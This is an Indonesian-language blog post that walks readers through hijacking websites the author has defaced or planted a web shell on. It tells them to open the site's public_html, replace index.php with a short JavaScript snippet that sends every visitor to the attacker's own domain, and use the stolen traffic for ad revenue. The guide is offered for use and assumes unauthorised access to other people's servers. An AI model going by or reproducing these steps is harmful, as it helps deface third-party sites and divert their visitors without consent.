Trik Redirect Website (FULL REDIRECT)

Halo gan :v kali ini saya akan memberikan cara redirect website, hmmm gimana sih caranya? pasti pada penasaran yah wkwkwwkw gw juga.. eh padhal w kan dah tau

lansung kimak gens hwhwhwh

Untuk tutor redirect ini aku praktekan di website yang telah aku deface atau telah aku upload shell hwhwhwhwh

 FULL REDIRECT

1. kamu harus punya website yg dah lu upload shell2. Masuk ke home directory atau public_html, lalu edit file index.php terserah yg mana yg mau lu edit 


3. Edit/hapus script php
4. Ganti dengan script dibawah ini:

<script> delayRedirect('http://khoirulrisqi.com'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",10); }</script>

Note:
http://khoirulrisqi.com = ganti dengan website yg dituju
10 = time/waktu dalam hitungan detik. 


HMMM mudahkan? ya lumayan buat nambah visitor blog hhhhhh
bagi kalean yg maenan adsense atau apalah pake trik ini lumayan hwhwhwh

0 Komentar untuk "Trik Redirect Website (FULL REDIRECT)"

Back To Top